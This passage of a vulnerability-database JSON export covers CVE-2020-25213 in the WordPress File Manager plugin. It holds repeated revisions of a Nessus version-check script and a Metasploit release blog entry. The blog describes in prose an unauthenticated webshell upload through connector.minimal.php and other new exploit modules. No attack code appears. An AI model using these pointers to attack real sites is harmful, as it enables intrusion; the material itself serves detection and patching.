script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit(WordPress File Manager Unauthenticated Remote Code Execution)"]}, "lastseen": "2021-09-04T00:44:29", "differentElements": ["vpr"], "edition": 12}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "83e2d496d14868695ec73bba7ddf8e41", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-21T12:07:25", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-21T12:07:25", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-09-21T12:07:25", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit(WordPress File Manager Unauthenticated Remote Code Execution)"]}, "lastseen": "2021-09-21T12:07:25", "differentElements": ["vpr"], "edition": 13}, {"bulletin": {"id": "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "hash": "aaaeeab8a8a7aae1437ac2d03ef9148e", "type": "nessus", "bulletinFamily": "scanner", "title": "WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution", "description": "The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to 6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An unauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php file, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-09-04T00:00:00", "modified": "2020-11-12T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/140211", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?53de38d7", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213"], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-30T00:30:36", "history": [], "viewCount": 14, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-30T00:30:36", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-09-30T00:30:36", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit(WordPress File Manager Unauthenticated Remote Code Execution)"]}, "lastseen": "2021-09-30T00:30:36", "differentElements": ["vpr"], "edition": 14}], "viewCount": 17, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "githubexploit", "idList": ["6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "21A5FEEE-9C4D-52D3-BCE6-7EABF0888631"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-0869"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "zdt", "idList": ["1337DAY-ID-35215"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-10-05T12:17:25", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-10-05T12:17:25", "rev": 2}}, "objectVersion": "1.6", "pluginID": "140211", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(140211);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/12\");\n\n script_cve_id(\"CVE-2020-25213\");\n script_xref(name:\"IAVA\", value:\"2020-A-0425\");\n\n script_name(english:\"WordPress Plugin 'File Manager' 6.x < 6.9 Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WordPress application has a plugin installed that is vulnerable to a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The WordPress application running on the remote host has a version of the 'File Manager' plugin that is 6.x prior to\n6.9. It is, therefore, affected by a remote code execution vulnerability due to improper inclusion of elFinder. An\nunauthenticated, remote attacker can exploit this, by sending a specially crafted request to the connector.minimal.php\nfile, to gain remote code execution on the vulnerable WordPress site.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://www.wordfence.com/blog/2020/09/700000-wordpress-users-affected-by-zero-day-vulnerability-in-file-manager-plugin/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53de38d7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the 'File Manager' plugin to version 6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25213\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WordPress File Manager Unauthenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:wordpress:wordpress\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"wordpress_plugin_detect.nbin\");\n script_require_keys(\"installed_sw/WordPress\", \"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\napp_info = vcf::wordpress::plugin::get_app_info(plugin:'wp-file-manager');\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '6.0', 'fixed_version' : '6.9' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:wordpress:wordpress"], "solution": "Upgrade the 'File Manager' plugin to version 6.9 or later.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2020-25213", "vpr": {"risk factor": "Critical", "score": "9.2"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2020-09-01T00:00:00", "vulnerabilityPublicationDate": "2020-09-01T00:00:00", "exploitableWith": ["Metasploit(WordPress File Manager Unauthenticated Remote Code Execution)"], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "rapid7blog": [{"id": "RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7", "hash": "479a4b2b413b49664f38d6d1b59b4c5a", "type": "rapid7blog", "bulletinFamily": "info", "title": "Metasploit Wrap-Up", "description": "## SaltStack RCE\n\n\n\n[wvu-r7](<https://github.com/wvu-r7>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14379>) that targets SaltStack\u2019s Salt software. Specifically, the module exploits both an authentication bypass (CVE-2020-25592) and a command injection vulnerability (CVE-2020-16846) in SaltStack\u2019s REST API to get code execution as `root` through Salt\u2019s SSH client on infected versions. You can read more about the vulns [on AttackerKB](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution?referrer=wrapup#rapid7-analysis>).\n\n## Hack Metasploit with Metasploit\n\n[justinsteven](<https://github.com/justinsteven>) both discovered a vulnerability (CVE-2020-7384) in and added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14331>) for Metasploit\u2019s `msfvenom` utility. `msfvenom` allows users to use custom apk templates to inject a payload into; however, `msfvenom` does not sanitize certain fields, such as the `Owner` field, that get passed into a `Open3.popen3()` call. Because of this, an unsuspecting user of `msfvenom` might use a malicious template and subsequently give an attacker a shell on the user\u2019s computer. This issue has been fixed in Metasploit\u2019s `6.0.12` release and Metasploit Pro\u2019s `4.19.0` release.\n\n## Wordpress File Manager RCE\n\n[ide0x90](<https://github.com/ide0x90>) added an exploit [module](<https://github.com/rapid7/metasploit-framework/pull/14253>) that targets various versions of a popular Wordpress plugin, `Wordpress File Manager`. The vulnerability (CVE-2020-25213) is due to a leftover example file that enables unauthenticated execution of a set of commands. One of those commands is an `upload` command, which makes uploading a php webshell and getting code execution effortless.\n\n## Apache Zookeeper Info Disclosure\n\n[juushya](<https://github.com/juushya>) added an auxiliary [module](<https://github.com/rapid7/metasploit-framework/pull/14269>) that obtains useful information such as IPs of connected clients, server OS information and statistics, and log files from Apache Zookeeper instances.\n\n## New modules (4)\n\n * [SaltStack Salt REST API Arbitrary Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14379>) by wvu and KPC, which exploits [CVE-2020-16846](<https://attackerkb.com/topics/FrF3udya6o/cve-2020-16846-saltstack-unauthenticated-shell-injection?referrer=wrapup#rapid7-analysis>) and [CVE-2020-25592](<https://attackerkb.com/topics/TCY0EUyJIW/cve-2020-25592-saltstack-authentication-bypass-and-salt-ssh-command-execution>)\n * [WordPress File Manager Unauthenticated Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/14253>) by Alex Souza (w4fz5uck5) and Imran E. Dawoodjee, which exploits [CVE-2020-25213](<https://attackerkb.com/topics/biVgLIkiSE/cve-2020-25213>)\n * [Rapid7 Metasploit Framework msfvenom APK Template Command Injection](<https://github.com/rapid7/metasploit-framework/pull/14331>) by Justin Steven, which exploits [CVE-2020-7384](<https://attackerkb.com/topics/MmrdI6rWUn/cve-2020-7384>)\n * [Apache ZooKeeper Information Disclosure](<https://github.com/rapid7/metasploit-framework/pull/14269>) by Karn Ganeshen\n\n## Enhancements and features\n\n * PR [#14387](<https://github.com/rapid7/metasploit-framework/pull/14387>) by [adfoster-r7](<https://github.com/adfoster-r7>) added a check to ensure that uses of `AutoCheck` are always prepended as opposed to included in modules.\n * PR [#14373](<https://github.com/rapid7/metasploit-framework/pull/14373>) by [dwelch-r7](<https://github.com/dwelch-r7>) removed the unused Netware console session type from Framework.\n * PR [#14371](<https://github.com/rapid7/metasploit-framework/pull/14371>) by [h00die](<https://github.com/h00die>) added vulnerable version information to the `auxiliary/scanner/http/drupal_views_user_enum` module.\n * PR [#14353](<https://github.com/rapid7/metasploit-framework/pull/14353>) by [agalway-r7](<https://github.com/agalway-r7>) modified the `msfdb` command to show more readable and informative output to the user.\n\n## Bugs fixed\n\n * PR [#14304](<https://github.com/rapid7/metasploit-framework/pull/14304>) by [b4rtik](<https://github.com/b4rtik>) updated the `post/windows/manage/execute_dotnet_assembly` module to be able to handle additional function signatures of the code that will be injected into.\n * PR [#14382](<https://github.com/rapid7/metasploit-framework/pull/14382>) from [h00die](<https://github.com/h00die>) fixed a crash in the `auxiliary/analyze/apply_pot` module caused by an out-of-date symbol name.\n * PR [#14378](<https://github.com/rapid7/metasploit-framework/pull/14378>) by [adfoster-r7](<https://github.com/adfoster-r7>) added proper synchronization to the job status tracker that is used by Metasploit\u2019s RPC service.\n * PR [#14370](<https://github.com/rapid7/metasploit-framework/pull/14370>) by [cgranleese-r7](<https://github.com/cgranleese-r7>) fixed a crash in `msfconsole`\u2019s `generate` command caused by attempting to tab complete input with no results.\n * PR [#14363](<https://github.com/rapid7/metasploit-framework/pull/14363>) by [zeroSteiner](<https://github.com/zeroSteiner>) fixed an issue in the `auxiliary/scanner/smb/smb_login` module that reported false negatives for valid credentials when `msfconsole` was started with `bundle exec` preceding the command.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222020-11-05T10%3A12%3A21-06%3A00..2020-11-12T16%3A18%3A40%2B00%3A00%22>)\n * [Full diff 6.0.15...6.0.16](<https://github.com/rapid7/metasploit-framework/compare/6.0.15...6.0.16>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "published": "2020-11-13T19:08:01", "modified": "2020-11-13T19:08:01", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://blog.rapid7.com/2020/11/13/metasploit-wrap-up-87/", "reporter": "Shelby Pace", "references": [], "cvelist": ["CVE-2020-16846", "CVE-2020-25213", "CVE-2020-25592", "CVE-2020-7384"], "lastseen": "2020-11-13T20:46:22", "history": [], "viewCount": 127, "enchantments": {"dependencies": {"references": [{"type": "rapid7blog", "idList": ["RAPID7BLOG:54F1D96262CFC427DBA32564C2E47A77"]}, {"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197", "AKB:87D730E9-750C-46D0-8C95-7F3FC0F5847C", "AKB:C751071A-7880-42C8-A7D3-732A54F317B3"]}, {"type": "cve", "idList": ["CVE-2020-16846", "CVE-2020-25213", "CVE-2020-7384", "CVE-2020-25592"]}, {"type": "githubexploit", "idList": ["21A5FEEE-9C4D-52D3-BCE6-7EABF0888631", "6D0B2EF0-7703-5E2D-9FF7-57C0B047B5ED", "C859A5E0-C211-5170-A4E4-B28B4732AB24", "55F28626-3E3E-5C2B-8360-EAB6F162BDA7"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-16846", "DEBIANCVE:CVE-2020-25592"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-25592", "RH:CVE-2020-16846"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2020-25592", "UB:CVE-2020-16846"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2020-3431", "CPAI-2020-0869"]}, {"type": "nessus", "idList": ["OPENSUSE-2020-1868.NASL", "OPENSUSE-2021-899.NASL", "OPENSUSE-2020-1833.NASL", "SALTSTACK_3002_MULTIPLE_VULNERABILITIES.NASL", "WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL", "DEBIAN_DLA-2480.NASL", "SUSE_SU-2020-14538-1.NASL", "FREEBSD_PKG_50259D8B243E11EB8BAEB42E99975750.NASL", "DEBIAN_DSA-4837.NASL", "FEDORA_2020-5F08623DA1.NASL", "SUSE_SU-2020-3244-1.NASL", "FEDORA_2020-9E040BD6DD.NASL", "SUSE_SU-2020-3155-1.NASL", "SUSE_SU-2020-3243-1.NASL", "OPENSUSE-2021-2106.NASL", "SALTSTACK_CVE-2020-16846.NBIN", "GENTOO_GLSA-202011-13.NASL", "FEDORA_2020-F9FA7892F2.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003", "PACKETSTORM:161200", "PACKETSTORM:160039", "PACKETSTORM:160004"]}, {"type": "zdt", "idList": ["1337DAY-ID-35223", "1337DAY-ID-35215", "1337DAY-ID-35749", "1337DAY-ID-35216"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4837-1:C6F2E", "DEBIAN:DLA-2480-1:7CF8B", "DEBIAN:DSA-4837-1:8C156", "DEBIAN:DLA-2480-1:6BEB1"]}, {"type": "archlinux", "idList": ["ASA-202011-7"]}, {"type": "freebsd", "idList": ["50259D8B-243E-11EB-8BAE-B42E99975750"]}, {"type": "gentoo", "idList": ["GLSA-202011-13"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1868-1", "OPENSUSE-SU-2021:0899-1", "OPENSUSE-SU-2020:1833-1", "OPENSUSE-SU-2021:2106-1"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "exploitdb", "idList": ["EDB-ID:49491"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:69504813A1D941B22A0FAA90D59264ED"]}, {"type": "zdi", "idList": ["ZDI-20-1383", "ZDI-20-1382", "ZDI-20-1379", "ZDI-20-1381", "ZDI-20-1380"]}, {"type": "fedora", "idList": ["FEDORA:EF65330E901D", "FEDORA:79C7531ABCB9", "FEDORA:49ED13095434"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2020-11-13T20:46:22", "rev": 2}, "score": {"value": 6.4, "vector": "NONE", "modified": "2020-11-13T20:46:22", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "thn": [{"id": "THN:7FD924637D99697D78D53283817508DA", "hash": "3c55e3d5a1881a908499d1e9d686bdc5", "type": "thn", "bulletinFamily": "info", "title": "Top 15 Vulnerabilities Attackers Exploited Millions of Times to Hack Linux Systems", "description": "[](<https://thehackernews.com/images/-mNDlC0tKMKU/YSOiCQjKsfI/AAAAAAAADm0/8vxg1C4GweIrljnlPQrCj0yPLMYs18y_ACLcBGAsYHQ/s0/linux.jpg>)\n\nClose to 14 million Linux-based systems are directly exposed to the Internet, making them a lucrative target for an array of real-world attacks that could result in the deployment of malicious web shells, coin miners, ransomware, and other trojans.\n\nThat's according to an in-depth look at the Linux threat landscape published by U.S.-Japanese 